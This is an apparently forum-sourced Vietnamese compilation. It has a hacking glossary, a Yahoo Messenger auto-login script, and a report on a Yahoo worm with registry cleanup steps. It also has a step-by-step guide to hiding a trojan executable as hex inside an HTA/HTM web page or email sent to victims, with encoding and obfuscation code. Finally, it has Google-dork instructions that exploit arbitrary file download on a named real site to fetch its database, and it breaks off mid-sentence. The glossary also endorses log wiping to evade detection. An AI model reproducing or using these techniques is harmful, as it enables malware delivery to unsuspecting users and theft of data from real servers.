CGI: Là từ viết tắt của “Common Gateway Interface” (Giao diện cổng chung), cho phép khởi tạo giao tiếp giữa server và chương trình nhờ các định dạng đặc tả thông tin. Lập trình CGI cho phép viết chương trình nhận lệnh khởi đầu từ trang web, trang web dùng định dạng HTML để khởi tạo chương trình. Chương trình CGI chạy dưới biến môi trường duy nhất. Khi WWW khởi tạo chương trình CGI, nó tạo ra một số thông tin đặc biệt cho chương trình và đáp ứng trở lại từ chương trình CGI. Sau đó, server xác định loại file chương trình cần thực thi. Nói chung, lập trình CGI là viết chương trình nhận và truyền dữ liệu qua Internet tới WWW server. Chương trình CGI sử dụng dữ liệu đó và gửi đáp ứng HTML trở lại máy khách

Shell: Là chương trình giữa người dùng với nhân Linux. Mỗi lệnh được đưa ra sẽ được Shell diễn dịch rồi chuyển tới nhân Linux. Nói một cách dễ hiểu, Shell là bộ diễn dịch ngôn ngữ lệnh, ngoài ra nó còn tận dụng triệt để các trình tiện ích và chương trình ứng dụng có trên hệ thống.

NetBios:Là một giao thức, công nghệ nối mạng của Windows 9.x. Nó được thiết kế trong môi trường mạng LAN để chia sẻ tài nguyên (như dùng chung các File, Folder, máy in và nhiều tài nguyên khác…). Mô hình này rất giống mô hình mạng ngang hàng 2P. Thông thường một mạng dùng giao thức Netbios thường là Netbios Datagram Service (Port 138), Netbios Session Service (Port 139) hoặc cả hai.

SYN: Là từ viết tắt của “The Synchronous Idle Character” (tạm dịch: Ký tự đồng bộ hoá). Quá trình thực hiện SYN sẽ diễn ra như sau:
Đầu tiên, A sẽ gửi cho B yêu cầu kết nối và chờ cho B trả lời. Sau khi B nhận được yêu cầu này sẽ trả lời lại A là “đã nhận được yêu cầu từ A” (ACK) và “đề nghị trả lời lại để hoàn thành kết nối” (SYN). Đến lúc này, nếu A trả lời lại “đồng ý” (SYN) thì kết nối sẽ được khởi tạo.

Cookies: Là những phần dữ liệu nhỏ có cấu trúc được chia sẻ giữa website và trình duyệt của người dùng đã được mã hoá bởi website đó. Cookies được lưu trữ dưới những file dữ liệu nhỏ dạng text (có dung lượng dưới 4k). Chúng được các site tạo ra để lưu trữ/truy tìm/nhận biết các thông tin về người dùng đã ghé thăm site và những vùng mà họ đi qua trong site. Những thông tin này có thể bao gồm tên/định danh người dùng, mật khẩu, sở thích, thói quen…

LAN: Là từ viết tắt của “Local Area Network”. Một hệ thống các máy tính và thiết bị ngoại vi được liên kết với nhau. Người sử dụng mạng cục bộ có thể chia sẻ dữ liệu trên đĩa cứng, trong mạng và chia sẻ máy in.

Vulnerability: Là một vùng, điểm dễ bị tổn thương trong hệ thống theo một yêu cầu được phát hiện ra, một đặc điểm hay một tiêu chuẩn, hay một vùng không được bảo vệ trong toàn bộ cấu trúc bảo mật của hệ thống mà để lại cho hệ thống các điểm dễ bị tấn công hoặc chịu ảnh hưởng các vấn đề khác. Các hacker thường khai thác (exploit) vulnerability để tấn công vào hệ thống.

Anonymous: Ẩn danh, nặc danh

IIS: Là chữ viết tắt của “Internet Information Server”. Đây là một chương trình WebServer nổi tiếng của Microsoft.

Account: Tài khoản là sự kết hợp của hai yếu tố username (tên người dùng) và password (mật khẩu) do một dịch vụ nào đó đã cung cấp cho bạn khi bạn đã đăng ký với họ để bảo mật cho bạn.

ISP: Là chữ viết tắt của “Internet Service Provider” (Nhà cung cấp dịch vụ Internet).

TCP/IP: Là chữ viết tắt của “Transmission Control Protocol and Internet Protocol”. Gói tin TCP/IP là một khối dữ liệu đã được nén, sau đó kèm thêm một header và gửi đến một máy tính khác. Phần header trong một gói tin chứa địa chỉ IP của người gửi gói tin.

Whois: Là một chương trình rất hữu ích, giúp bạn tìm ra những thông tin về hosts, networks và administrator của trang web đó là ai (Địa chỉ, Email, IP..)

UDP: Là chữ viết tắt của “User Datagram Protocol”. Có nhiệm vụ giống như TCP, nhưng nó không đảm bảo sự chính xác của thông tin được chuyển tải. UDP chỉ đơn giản là những gói tin có điểm xuất phát và điểm đích xác định

IRC: Là chữ viết tắt của “Internet Relay Chat”. Đây là một chương trình độc lập nơi mà bạn có thể tham gia vào các kênh chat.

IPC: Là chữ viết tắt của “Inter-Process Communication”. Được dùng trong việc chia sẻ dữ liệu giữa các ứng dụng và máy tính trên mạng (NT/2K). Khi một máy được khởi động và log vào mạng, hdh sẽ tạo một chia sẻ ngầm định tên là IPC$. Nó sẽ giúp cho các máy khác có thể nhìn thấy và kết nối đến các chia sẻ trên máy này.

Remote Access: Truy cập từ xa qua mạng

GNU Debugger: Là chương trình biên dịch gcc và công cụ gỡ rối gdb

SSI: Là chữ viết tắt của “Server Side Includes”. Đây là các chỉ dẫn được đặt trong các file html. Server sẽ chịu trách nhiệm phân tích các chỉ dẫn này và sẽ chuyển kết quả cho client

ActiveX: Là một hệ thống tiêu chuẩn dùng để xây dựng các thành phần (component) trong môi trường Windows. Các thành phần này không những có khả năng vận hành một cách độc lập mà còn có thể được khai thác bởi các thành phần khác. Đây là những thành phần được viết bằng nhiều ngôn ngữ khác nhau và rất đa dạng, có thể là các ActiveX Control (điều khiển độc lập) để nhúng vào chương trình khác từ lúc thiết kế chương trình, có thể là các ActiveX DLL (thư viện liên kết động) mà các chương trình khác tham chiếu đến.

PPP: Là chữ viết tắt của “Point-to-Point”. Đây là một giao thức kết nối Internet tin cậy thông qua Modem

Serial Direct Cable Connection: Là công nghệ kết nối máy tính bằng Cable truyền nhận dữ liệu

Ethernet: Là công nghệ nối mạng có năng lực mạnh được sử dụng hầu hết trong các mạng LAN. Đây là mạng dùng CSMA/CD (carrier sense media access/collision detection)

Pwdump: Là chữ viết tắt của “Password Dumper”. Đây là một công cụ tuyệt vời không thể thiếu được khi Hack vào hệ thống WinNT

MAC: Là chữ viết tắt của “Media Access Control”

OSI: Là chữ viết tắt của “Open System Interconnection”, hay còn gọi là mô hình chuẩn OSI. Vậy mô hình OSI là gì ?
Thực ra trong quá khứ, việc truyền thông giữa các máy tính từ các nhà cung cấp khác nhau rất khó khăn, bởi lẽ chúng sử dụng các giao thức và định dạng dữ liệu khác nhau. Do vậy Tổ chức tiêu chuẩn hóa quốc tế (ISO) đã phát triển một kiến trúc truyền thông được biết đến như là mô hình Kết nối lẫn nhau qua hệ thống mở - Open System Interconnection (OSI) một mô hình định nghĩa các tiêu chuẩn liên kết các máy tính từ các nhà cung cấp khác nhau.

ACK: Là chữ viết tắt của “Acknowledgement”

ATM: Là chữ viết tắt của “Asynchronous Transfer Mode”. Đây là một kỹ thuật mạng định hướng kết nối mà sử dụng những cell nhỏ có kích thước cố định ở mức thấp nhất. ATM có ưu điểm về khả năng hỗ trợ dữ liệu thoại và video

EGP: Là chữ viết tắt của “Exterior Gateway Protocol”. Đây là một thuật ngữ áp dụng cho giao thức nào được sử dụng bởi bộ định tuyến trong một hệ tự quản để thông báo khả năng đi đến mạng cho bộ định tuyến trong hệ tự quản khác

DHCP: Là chữ viết tắt của “Dynamic Host Configuration Protocol”. Đây là một giao thức mà máy sử dụng để lấy dược tất cả thông tin cấu hình cần thiết, bao gồm cả địa chỉ IP

OWA: Là chữ viết tắt của “Outlock Web Access”. Đây là Module của Microsoft Exchanger Server (một Server phục vụ Mail), nó cho phép người dùng truy cập và quản trị Mailbox của họ từ xa thông qua Web Browser

URL: Là chữ viết tắt của “Uniform Resource Locator”, dùng để chỉ tài nguyên trên Internet. Sức mạnh của web là khả năng tạo ra những liên kết siêu văn bản đến các thông tin liên quan. Những thông tin này có thì là những trang web khác, những hình ảnh, âm thanh… Những liên kết này thường được biểu diễn bằng những chữ màu xanh có gạch dưới được gọi là anchor. Các URL có thể được truy xuất thông qua một trình duyệt (Browser) như IE hay Netscape

HTML: Là chữ viết tắt của “Hyper Text Markup Language”, tức là ngôn ngữ siêu văn bản. Đây là một ngôn ngữ dùng để tạo trang web, chứa các trang văn bản và những tag (thẻ) định dạng báo cho web browser biết làm thế nào thông dịch và thể hiện trang web trên màn hình.

Web page là trang văn bản thô (text only), nhưng về mặt ngữ nghĩa gồm 2 nội dung:
- Đoạn văn bản cụ thể.
- Các tag (trường văn bản được viết theo qui định) miêu tả một hành vi nào đó, thường là một mối liên kết (hyperlink) đến trang web khác

SMB: Là chữ viết tắt của “Server Message Block”. Đây là một trong những protocols phổ biến cho PC, cho phép bạn dùng những share files, disks, directory, printers và trong vài hướng cả cổng COM

CPU: Là chữ viết tắt của “Central Processing Unit”. Đây là tập hợp nhiều mạch điện dùng để điều khiển mọi hoạt động chính của máy

POP3: Là chữ viết tắt của “Post Office Protocol Version 3″. POP3 daemon thường được chạy ở cổng 110 (đây là cổng chuẩn của nó). Dùng để check mail, bạn phải kết nối đến server đang chạy POP3 daemon ở cổng 110

TFTP: Là chữ viết tắt của “Trial File Transfer Protocol”. TFTP chạy trên cổng 69 và dùng giao thức UDP nên rất không an toàn

RIP: Là chữ viết tắt của “Routing Information Protocol”, chạy trên cổng 512

HyperTerminal: Là chương trình cho phép bạn mở một server trên bất kỳ port nào của máy tính , và cho phép lắng nghe những thông tin đầu vào từ những máy tính xác định.

Bạn muốn thiết lập nó hãy vào : Start>Programs>Accessories>Communications
Rồi chọn HyperTerminal

DES: Là chữ viết tắt của “Data Encrypt Standar”. Đây là một trong những chuẫn mã hoá password thông dụng, rất khó bị #####, chỉ có một cách duy nhất và cũng là dễ nhất là dùng tự điển

WU-FTP: Là chữ viết tắt của “Washington University - File Transfer Protocol”. Đây là một phần mềm Server phục vụ FTP được dùng khá phổ biến trên các hệt thống Unix & Linux. Chương trình này từng bị một lỗi khá nghiêm trọng, đó là sự thi hành của file globbing trên Server chứa tính dễ tổn thương cho phép các hacker thi hành các code lệnh trên server từ xa (tất nhiên là code có hại rồi). dẫn đến việc ghi đè các file lên servervà cuối cùng dẫn đến crash hệ thống”

NIS: Là chữ viết tắt của “Network Information Server”.

GUI: Là chữ viết tắt của “Graphic User Interface”. Đây là giao diện đồ hoạ người sử dụng trong hệ điều hành Linux

Global: Tiện ích dòng lệnh này sẽ hiển thị các thành viên của Global Group trên server hay domain được chỉ định.
Cú pháp : C: >global “Domain Users” domain1

Local: Giống như Global nhưng nó hiển thị các thành viên của Local Group. Chẳng hạn như ta muốn truy vấn danh sách Administrator Group.
Cú pháp : C: > local “administrators” domain1

SOCKS: SOCKS được tạo ra bởi chữ SOCKetS và được phán triển chủ yếu bởI NEC, cũng như được ITEF đưa thành một chuấn của Internet, đựợc định nghĩ trong RFC (Request for comment). Nhiệm vụ của SOCKS là cầu nối trung gian giữa một đầu của SOCKS server đến đầu kia của SOCKS server:
CLIENT ——–> IN - SOCKS SERVER - OUT —————> SERVER

SOCK được dùng chủ yếu trong công nghệ Proxy server và Firewall. Hiện nay có version SOCKS4 và SOCKS5. Socks 5 là bản phát triển sau nên có thêm tính năng để authorize, và có thể sử dụng UDP (SOCKS 4 chỉ có TCP).

SQL Injection: Từng là một kiểu tấn công vào trang web phổ biến. Bằng cách chèn các mã SQL query/command vào input trước khi chuyển cho ứng dụng web xử lí, kẻ tấn công có thể đăng nhập mà không cần username và password, remote execution, dump data và lấy root của SQL server. Công cụ dùng để tấn công là một trình duyệt web bất kì, có thể dùng Internet Explorer, Netscape, Lynx, …

DoS: Là chữ viết tắt của “Denial of Service” (Tấn công từ chối dịch vụ). Đây là phương pháp thường được hacker sử dụng để tấn công một trang web khi các phương pháp tấn công khác tỏ ra không có hiệu quả. Đặc điểm của DoS là làm hao tổn một số lượng tài nguyên trên máy chủ, chiếm dụng băng thông, bộ nhớ, CPU, đĩa cứng… làm cho máy chủ không thể đáp ứng

Fake IP: IP giả mạo

Debug: Là chương trình đi kèm với DOS. Đây là một công cụ tuyệt vời để gỡ rối chương trình, phần mềm, đọc bộ nhớ bị che giấu như boot sector và nhiều hơn nữa… Để debug được chương trình, bạn cần phải có kiến thức về Assembly.

TCP Port Scanning: Là dạng cơ bản nhất của các chương trình Scanner. Loại chương trình này sẽ thử mở một kết nối TCP đến một Port nào đó để xác định trạng thái của Port này

Web spoofing: Là một dạng tấn công cho phép một người nào đó xem và chỉnh sửa mọi trang web gửi đến máy nạn nhân. Họ có thể theo dõi mọi thông tin do nạn nhân điền vào các form. Điều này đặc biệt nguy hiểm với những thông tin cá nhân như địa chỉ, số thẻ tín dụng, số tài khoản ngân hàng, mật mã truy cập vào tài khoản đó…. Web spoofing hoạt động trên cả IE lẫn Netscape. Nó hoạt động dựa vào việc giao thức SSL được dùng như một dạng giấy chứng nhận cho những Website xác thực. Việc tấn công theo kiểu này có thể được thi hành bằng cách dùng Javascript và Web server plug-ins

Footprinting: Phương thức “In dấu chân” là thu thập tất cả những thông tin quan trọng về mục tiêu của bạn như: Email, IP, Domain… Đây bước cơ bản đầu tiên của hacker trước khi hack vào một hệ thống nào đó.

XSS: Là chữ viết tắt của “Cross site scripting”. Đây là thuật ngữ nói đến việc website sử dụng cách nào đó để ăn cắp thông tin của người dùng (ví dụ như cookie chẳng hạn). Hacker sẽ dụ nạn nhân đến trang web của mình bằng cách đưa một siêu liên kết (hyperlink) hấp dẫn. Dĩ nhiên những hacker giỏi thường mã hóa cả hyperlink của mình để giảm thiểu sự nghi ngờ. Sau khi dữ liệu của nạn nhân bị đánh cắp, nó sẽ gửi đến cho hacker và đưa ra một trang web có nội dung phù hợp với hyperlink giả

Race Conditions: Race Conditions (tình trạng tranh đua) là một trong những cuộc tấn công phổ biến trên các hệ thống Unix/Linux

Race Conditions xảy ra khi một chương trình hoặc quy trình xử lý nào đó thực hiện một sự kiểm tra. Giữa thời gian mà một sự kiểm tra được làm và hoạt động được thực hiện, kêt quả của cuộc kiểm tra đó có thể sẽ phản chiếu trạng thái của hệ thống. Hacker sẽ lợi dụng chương trình hoặc quy trình này trong lúc nó thực hiện đặc quyền

Buffer Overflow: Lỗi tràn bộ đệm. Đây là một trong những kỹ thuật Hacking kinh điển nhất

Nuke: Là một trong những kỹ thuật khá lợi hại. Nếu như bạn biết được IP của một máy tính bất kỳ đang kết nối thì nuke hoàn toàn có thể làm cho máy tính đó disconnect, cho dù đó là của cả một mạng LAN

Sniffer: Là chương trình cho phép bạn chộp tất cả các gói dữ liệu đang chuyển card mạng của máy bạn. Các dữ liệu đó có thể là tên người dùng, mật khẩu, một số thông tin quan trọng khác, …

Log: Là thao tác ghi nhận lại quá trình sử dụng dịch vụ của bạn. Khi xâm nhập một máy tính hay server thì việc xoá log là không thể thiếu. Bởi vì, nếu không xoá log thì từ đó người ta có thể tìm ra IP thật của bạn

Trojan: Là một chương trình bất hợp pháp được chứa bên trong một chương trình hợp pháp. Chương trình không hợp pháp này thực hiện những hàm bí mật mà người dùng không biết hay không cần đến. Trojan có nhiều loại nhưng vẫn chủ yếu là 2 loại chính :
+ Trojan lấy password rồi gửi password lấy được qua email (vd : Kuang2, Hooker, barok…)
+ Trojan dùng để điều khiển từ xa (vd : Sub Seven 7, Back Orifice 2000…)

Port surfing: Là kết nối đến các cổng của một máy chủ để thu thập các thông tin, chẳng hạn như thời gian, hệ điều hành, các dịch vụ đang chạy,…

Finger: Là một chương trình rất hữu ích, giúp bạn thu thập rất nhiều thông tin về users (thường bị disable)

Nmap: Là chữ viết tắt của “Network exploration tool and security scanner” . Đây là chương trình quét hàng đầu với tốc độ cực nhanh và cực mạnh. Nó có thể quét trên mạng diện rộng và đặc biệt tốt đối với mạng đơn lẻ. NMAP giúp bạn xem những dịch vụ nào đang chạy trên server (services/ports:webserver,ftpserver,pop3,…), server đang dùng hệ điều hành gì, loại tường lửa mà server sử dụng, … và rất nhiều tính năng khác. Nói chung NMAP hỗ trợ hầu hết các kỹ thuật quét như : ICMP (ping aweep), IP protocol, Null scan, TCP SYN (half open), … NMAP được đánh giá là công cụ hàng đầu của các Hacker cũng như các nhà quản trị mạng trên thế giới.

Netcat: Là một công cụ không thể thiếu đối với hacker khi muốn tấn công vào các website, server. Chương trình này đọc và ghi dữ liệu qua mạng thông qua giao thức TCP hoặc UDP. Kẻ tấn công có thể dùng Netcat một cách trực tiếp hoặc sử dụng chương trình, script khác để điều khiển Netcat. Netcat được coi như một exploitation tool do nó có thể tạo được liên kết giữa kẻ tấn công và server cho việc đọc và ghi dữ liệu.

Get Admin: Là “Leo thang đặc quyền” hay còn gọi là “Leo thang mức ưu tiên”. Đây được coi là một trong những bước quan trọng khi hacker đột nhập vào các hệ thống. Giả sử hacker chiếm được quyền và đăng nhập vào hệ thống Win NT. Nhưng user hacker lấy được không có quyền tương đương như nhóm Administrators mà thuộc nhóm có quyền thấp hơn. Như vậy hacker không có quyền làm nhiều thao tác như Admin. Do vậy, hacker phải thực hiện biện pháp “Get Admin” để đoạt quyền cao hơn nhằm kiểm soát hệ thống.

Netwatch: Là công cụ hiển thị các tài nguyên dùng chung trên hệ thống mạng mà bạn muốn hack

Usestat: Tiện ích dòng lệnh này có thể hiển thị User, Full name, ngày tháng và thời gian đăng nhập cho mỗi người dùng trên mỗi doamin đã chỉ định.

FootPrinting: Là cách mà hacker làm khi muốn lấy một lượng thông tin tối đa về máy chủ/doanh nghiệp/người dùng. Nó bao gồm chi tiết về địa chỉ IP, Whois, DNS ..v.v đại khái là những thông tin chính thức có liên quan đến mục tiêu. Nhiều khi đơn giản hacker chỉ cần sử dụng các công cụ tìm kiếm trên mạng để tìm những thông tin đó

Enumeration: Là tìm kiếm những tài nguyên được bảo vệ kém, hoạch tài khoản người dùng mà có thể sử dụng để xâm nhập. Nó bao gồm các mật khẩu mặc định, các script và dich vụ mặc định. Rât nhiều người quản trị mạng không biết đến hoặc không sửa đổi lại các giá trị này

Gaining Access: Là dựa vào những thông tin đã nắm được ở bước Enumeration mà hacker tấn công vào lỗi tràn bộ đệm, lấy và giả mã file password, hay thô thiển nhất là brute force (kiểm tra tất cả các trường hợp) password. Các tool thường được sử dụng ở bước này là NAT, podium, hoặc Lopht

Escalating Privileges: Là hacker tìm cách kiểm soát toàn bộ hệ thống. Hacker sẽ tìm cách crac_k password của admin, hoặc sử dụng lỗ hổng để leo thang đặc quyền trong trường hợp họ xâm nhập đựợc vào mạng với tài khoản Guest. “The John and Riper” là hai chương trình crac_k password rất hay được sử dụng

Pilfering: Là hacker sử dụng các máy tìm kiếm lại đựơc sử dụng để tìm các phương pháp truy cập vào mạng. Những file text chứa password hay các cơ chế không an toàn khác có thể là mồi ngon cho hacker.

Covering Tracks: Sau khi đã có những thông tin cần thiết, hacker tìm cách xoá dấu vết, xoá các file log của hệ điều hành làm cho người quản lý không nhận ra hệ thống đã bị xâm nhập hoặc có biết cũng không tìm ra kẻ xâm nhập là ai

PKC: Là chữ viết tắt của “Public key cryptos”. Có nghĩa là hệ thống mật mã sử dụng từ khóa chung

PUB: Một PUB thông thường có chứa các file để cho mọi người dowload, một số PUB có thể cho upload. Tuy nhiên, một PUB có thể không chỉ chứa các file dùng cho việc download, mà có thể chứa cả một “TRANG WEB”.

Local Exploit: Là khai thác cục bộ. Đây là một trong những phương pháp tấn công cao cấp của hacker

ĐỌC THÊM !!!!

Option Explicit
Dim WshShell
Set WshShell=CreateObject("WScript.Shell")
WshShell.Run"""C:\Program Files\Yahoo!\Messenger\Ypager.exe"""
WScript.Sleep 1500
WshShell.AppActivate"Sign In"
WScript.Sleep 200
WshShell.SendKeys"nick"
WScript.Sleep 200
WshShell.SendKeys"{TAB}"
WshShell.SendKeys"pass"
WScript.Sleep 200
WshShell.Sendkeys"{Enter}"

Bạn lưu đoạn code trên với notepad, chọn All file type và save với phần mở rộng là vbs nhé.
Yahoo sẽ tự động Log In mà không cần bạn bấm bất cứ cái gì.

Nên copy file này vào usb mang theo để đè phòng bị quên pass.

ĐỌC THÊM !!!!

Nhiều người sử dụng hệ thống tin nhắn nhanh của Yahoo đang trong tình trạng hoang mang, lo sợ vì máy tính của họ đã bị nhiễm một loại sâu lạ, lây lan qua chương trình chat phổ biến nhất VN. Các nạn nhân đều nhận từ nick chat của bạn bè đường link kèm lời mời hấp dẫn như:
+Kho phim cho ba con xem dai` han day hxxp://girltinh.tk/ << ( This message was certified by Welcome , no worm )

+Em xinh qua : hxxp://girltinh.tk/?=gaixinh << ( This message was certified by Welcome , no worm )

+Bao Thy dong phim sex ne hxxp://girltinh.tk/ ( This message was certified by Welcome , no worm )

+Pha' trinh em VIet Nam qua xinh : hxxp://girltinh.tk/?=phatrinh << ( This message was certified by Welcome , no worm )

+Hoa hau bikini 2007 hxxp://girltinh.tk/?=bikini2007 << ( This message was certified by Welcome , no worm )

+Em Nhat Xinh Lam` Tinh` Hay hxxp://girltinh.tk/?=nhatxinh be careful !!! << ( This message was certified by Welcome , no worm )

Khi đã xâm nhập được vào máy tính của nạn nhân, ngay lập tức hàng loạt thông điệp lặp lại kèm đường link có chứa virus sẽgửi tới các nick name có trong danh sách YM. Với kiểu lây lan theo cấp số nhân đó, vô số nạn nhân đã "dính đòn" trong thời gian rất ngắn.
- Lợi dụng lỗi MDAC cũ để phát tán virus khi dùng IE chưa cập nhật truy cập vào trang web hxxp://girltinh.tk.
- Virus gồm 2 file: SVCHOST.EXE và SVCHOST32.EXE để ở trong thư mục TMP:
TMP=C:\DOCUME~1\[usr]\LOCALS~1\Temp
- File SVCHOST32.EXE bị KAV phát hiện ra là Trojan-Spy.Win32.SCKeyLog.au. File còn lại chưa bị phát hiện. (Con này ai chơi gameonline coi chừng mất pass :157: )
Khi tệp ứng dụng có tên là Gaixinh.jpg.exe được nạp vào bộ nhớ, nó sẽ thay đổi Registry trên máy nạn nhân như sau:

1. Thêm giá trị DisableRegedit=1 vào khoá: HKEY_CURRENT_User\Software\Microsoft\Windows\CurrentVersion\Policies\System để khoá không cho truy cập vào Regedit.

2. Thêm giá trị [Yahoo!!!] C:\WINDOWS\Messenger.exe vào khoá: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run để nạp virus lúc Windows khởi động.

3. Thay đổi trang Homepage của Internet Explorer về trang chủ của virus bằng cách sửa giá trị của khoá HKEY_CURRENT_User \Software\Microsoft\Internet Explorer\Main\Start Page về một dạng địa chỉ khác

4. Thêm giá trị sau vào các khoá khác trong regedit: hxtp://xxxbots.net/Gift/New/ hoặc

HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_Launchcast.

CÁCH DIỆT

Bạn download file này về máy

http://www.mediafire.com/?cnmdg2jgfld

Sau đó kích đúp chuột vào từng file một trên để kích hoạt lại công cụ chỉnh sửa regedit.

Vào Start ==> Run ==> gõ REGEDIT==>tại khung bên trái cửa sổ Registry Editor, bạn tìm khoá
HKEY_LOCAL_MACHINESOFTWAREMicrosoft

Windows NTCurrentVersionWinlogon

và xoá mục “Shell”=”Explorer. Exe RVHOST.exe” trong khung bên trái.

Tìm đến khoá

HKEY_CURRENT_USERSoftwareMicrosoft

WindowsCurrentVersionRun

Xoá mục “Yahoo Messenger = RVHOST.exe”.

Tìm đến khoá

HKEY_CURRENT_USERSoftwareMicrosoft

WindowsCurrentVersionExplorer

WorkgroupCrawlerShare=”[SHARED DRIVE]New Folder.exe”

Tìm đến khoá

HKEY_CURRENT_USERSoftwareMicrosoft

WindowsCurrentVersionPoliciesSystem

Xoá mục “Disable Registry Tools” = “1”.

Tìm đến khoá

HKEY_CURRENT_USERSoftwareMicrosoft

WindowsCurrentVersionPoliciesExplorer

Xoá m ục “NofoderOption”.

Tìm đến khoá

HKEY_LOCAL_MACHINESYSTEMCurrentControlSet

ServicesSchedule

Xoá mục “AtTaskMaxHours”.

Tìm đến khoá

HKEY_LOCAL_MACHINESoftwareMicrosoft

WindowsCurrentVersion

Xoá mục “Run”= “BkavFw”.

Tìm đến khoá

HKEY_CURRENT_USERSoftwareMicrosoft

WindowsCurrentVersion

Xoá mục “Run”=”IEProtection”.

Đóng Registry lại.

Cách 2 /

Bạn cũng Download dòng Code như trên rồi kick chuột vào đấy cho nó thực thi lệnh .
. Khởi động lại máy tính bằng chế độ SafeMode (Bấm F8 lúc máy tính khởi động). Sau đó Vào Start -> Run rồi gõ Regedit rồi Enter. Hãy tìm khoá: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\

CurrentVersion\Run và xoá giá trị [Yahoo!!!] C:\WINDOWS\Messenger.exe.

Tiếp tục tìm HKEY_CURRENT_User \Software\Microsoft\Internet Explorer\Main\Start Page để vào xoá hoặc thay đổi về địa chỉ HomePage vẫn dùng.

Tìm toàn bộ các giá trị có nội dung như sau [url]http://xxxxots.net/Gift/New/ và xoá đi. Các khoá có thể thêm ví dụ là HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_Launchcast
và
HKEY_USERS\S-1-5-21-1708537768-1343024091-1957994488-500\Software\Yahoo\pager\View\YMSGR_Launchcast

Tìm tệp GirlXinh.jpg.exe và xoá đi (thường nằm trong Desktop hoặc My Documents), có thể tìm bằng chức năng Search của Windows.

Vào trong thư mục Windows tìm tệp Messenger.exe và xoá đi

Khởi động lại máy tính.

Giải pháp tình thế :

Messenger > Privacy options > chọn dòng Messages > chọn insert a new line in message ở phần pressing the enter in the message window . Lúc này muốn gởi cái gì đi phải click chuột vào chữ send chứ ko thể nhấn Enter đc .

ĐỌC THÊM !!!!

1) Hướng dẫn :

· Bước 1: chuẩn bị một file trojan.exe, kích thước khoảng 5 - 40Kb. Nếu bạn không có trojan, bạn có thể tải về từ trang TlSecurity.com hoặc tự viết một file
trojan.exe để xài ( nếu bạn làm dc bước này mà không cần hỗ trợ thì chẳng cần đọc bài này làm gì ^^ ) !

Bước 2: chạy convert16.exe để convert file trojan.exe sang trojan.hex

.· Bước 3: dùng 1 trình soạn thảo văn bản dạng text (nên dùng EditPlus ) để sửa file temp.htm như sau:
Thay phần .doc=”4D5A900... 64620000” thành .doc=”<đặt nội dung của file trojan.hex vào đây>” VD: .doc=”9631447da55abcd44ac25...”

Bước 4: Nhúng file nội dung file temp.htm sau khi sửa vào trang Web hoặc Email và gởi đến cho người khác !

2) Mã nguồn:

.· Files:
tempsrc.hta dùng để extract và execute trojan.exe
tempsrc.htm file htm chính
convert16.vbp & convert16.frm : file nguồn của chương trình Convert 16, được viết bằng Visual Basic 6, dùng để convert file .exe sang file .hex

· Những vấn đề chính:

Kĩ thuật ‘Convert 16’: dùng để tạo 1 file nhị phân, ví dụ như trojan.exe
chuyển mã ANSI của kí tự sang hệ cơ số 16 hexa. Từ mã ANSI của kí tự ở hệ 16 chúng ta dễ dàng chuyển về lại kí tự ban đầu. Để dễ hiểu, tôi đưa ra ví dụ sau:
Kí tự
L
P
T
V
C
l
u
b

2
0
0
1

Mã ANSI ở hệ 10
76
80
84
86
32
67
108
117
98
32
50
48
48
49

Mã ANSI ở hệ 16
4C
50
54
56
20
43
6C
75
62
20
32
30
30
31

Encode16 Decode16

“LPTV Club 2001” “4C50545620436C75622032303031” “LPTV Club 2001”

‘--- VBScript Code ---

function encode16(st)
for i = 1 to len(st)
temp = hex((asc(mid(st,i,1)))
‘ mid(st,i,1) lấy 1 kí tự trong chuổi st ở vị trí thứ i
‘ asc(mid(st,i,1)) trả về mã ANSI của kí tự này
‘ temp = hex((asc(mid(st,i,1))) sẽ chứa mã ANSI ở hệ 16 của kí tự
if len(temp) = 1 then ‘vì mã ANSI của kí tự chỉ nằm trong khoảng từ 0 đến 255 (0h-FFh), nên nếu độ dài của temp=1 chúng ta sẽ thêm 0 vào trước! Ví dụ: 0A, 07, ...
temp =”0” & temp
end if
encode16 = encode16 & temp
next
end function
function decode16(st)
for i =1 to len(st) step 2 ‘như ở trên, mỗi kí tự được mã bằng đúng 2 kí tự nên bước nhảy step = 2
decode16 = decode16 & chr(“&h” & mid(st,i,2))
‘ mid(st,i,2) trả về 1 chuổi gồm 2 kí tự, bắt đầu từ vị trí thứ i trong chuổi
‘chr(“&h” & mid(st,i,2)) trả về kí tự có mã ANSI ở hệ 16; “&h” dùng để chỉ hệ 16
next
end function
‘--- VBScript Code ---

Kĩ thuật ‘Encode’: được sử dụng trong file temp.hta & temp.htm

Mục đích:

+ giảm kích thước file

+ làm cho mã lệnh khó đọc đối với người khác

Ví dụ: thay vì viết lệnh rõ ràng:

on error resume next

dn=chr(34)

xd=vbcrlf

set wsh=createobject("wscript.shell")

set fso=createobject("scripting.filesystemobject")

Chúng ta cũng có thể viết lại như sau:

on error resume nextj=chr(34)q=vbcrlfset g=createobject("wscript.shell")set t6=createobject("scripting.filesystemobject")

ĐỌC THÊM !!!!

Đầu tiên anh em vào google và gõ key search :
Gõ keyword: allinurl: "download.asp?file=" hoặc
allinurl: "download.php?file=" hoặc
allinurl: "dl.asp?file=" hoặc
allinurl: "dl.php?file=" ....

Nó sẽ cho ra hàng loạt site dính bug này, thật là một nguồn tài nguyên khổng lồ cho việc thực hành và upload shell lên các server. Nó là sự kết hợp hoàn hảo giữa Google và RLI (Remote File Inclusion)

Bạn search trên Google xem nó thông báo có phát hoảng ko nhỉ? Không dưới hàng ngàn trang ^^
Thấy cái link nào dạng: download.asp?file=TENFILE thì có khả năng nghịch rồi.

Ví dụ: http://www.provincia.so.it/download.asp?file=DIU_GI_DO
Ta thử: http://www.provincia.so.it/download.asp?file=default.asp
Có một file mời download . Mở ra coi thấy có dòng:



--> http://www.provincia.so.it/download.asp?file=include/connettiDB.asp

Lại có một file nữa mời download. Mở ra coi thây có dòng:



--> http://www.provincia.so.it/download.asp?file=include/connOpen.asp

Lại một file nữa. Mở ra coi thấy có dòng:

percorsoDatabase="/database/DBSito.mdb"


Xong, download database

Link 1: http://www.provincia.so.it/download.asp?file=database/DBSito.mdb
Link 2 : http://www.provincia.so.it/database/DBSito.mdb

Chú ý:
Đây chẳng phải là một mã nguồn cụ thể nào cả, nên tinh ý một chút chứ
đừng rập theo khuôn mẫu quá nghen, nên dựa vào ví dụ trên và ứng dụng
một cách hợp lý. Với ASP thì thông thường trang chủ là default.asp, đôi
